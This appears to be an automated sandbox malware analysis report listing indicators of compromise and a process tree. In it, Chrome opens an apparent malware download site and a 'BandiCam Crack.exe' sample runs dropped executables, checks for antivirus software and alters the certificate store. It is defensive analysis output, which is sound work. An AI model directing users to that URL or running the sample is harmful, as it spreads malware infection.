Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe
Token: SeShutdownPrivilege	2680	chrome.exe
Token: SeCreatePagefilePrivilege	2680	chrome.exe

Suspicious use of FindShellTrayWindow 58 IoCs

Processes:

chrome.exesetup_2.exe_id25986943.exechrome.exe

pid	process
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2976	setup_2.exe_id25986943.exe
2976	setup_2.exe_id25986943.exe
2948	chrome.exe
2948	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe

Suspicious use of SetWindowsHookEx 21 IoCs

Processes:

BandiCam Crack.exesetup_b6ZYZIwz.exeis-VPF07.tmpIC44.exeIC44.exeafvJQ8Vb.exeis-LQ960.tmpZerkalo331.exe0HW768fG3olr.exeEeif6JOgRWUZxkt.exeis-24570.tmpZerkalo331.exeWerFault.exekKXIb9fN89vd9isuw6.exeis-40LCD.tmpSyncBackupShell.exeT5x5yJ8fvDw42wmDC6l.exechromedriver.exesetup_2.exe_id25986943.exe

pid	process
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3644	setup_b6ZYZIwz.exe
1272	is-VPF07.tmp
2236	IC44.exe
3308	IC44.exe
4328	afvJQ8Vb.exe
732	is-LQ960.tmp
816	Zerkalo331.exe
4384	0HW768fG3olr.exe
1948	Eeif6JOgRWUZxkt.exe
2464	is-24570.tmp
3716	Zerkalo331.exe
3808	WerFault.exe
4336	kKXIb9fN89vd9isuw6.exe
4076	is-40LCD.tmp
4080	SyncBackupShell.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
4868	chromedriver.exe
2976	setup_2.exe_id25986943.exe
2976	setup_2.exe_id25986943.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2680 wrote to memory of 1500	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1500	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 1984	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 216	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 216	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe
PID 2680 wrote to memory of 4296	2680	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://mgen.fast-dl.cc/
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0b619758,0x7ffb0b619768,0x7ffb0b619778
2⤵
PID:1500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:2
2⤵
PID:1984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:4296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3176 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3160 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:4732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:3976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:4376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5344 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5600 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
- Modifies registry class
PID:3904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5232 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:1336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3360 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5604 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5636 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5600 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:4160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4984 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3316 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5340 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:4488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5604 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5808 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4860 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:4660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6092 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6100 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4984 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:4316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3264 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5760 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:60

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5980 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:1904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5732 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:1664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5348 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:1840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:5008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6204 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6276 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:2804

C:\Users\Admin\Downloads\BandiCam Crack.exe
"C:\Users\Admin\Downloads\BandiCam Crack.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3272 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=5540 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=3268 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=6200 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5340 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=6544 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=4296 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2412

C:\Program Files\Google\Chrome\Application\chrome.exe
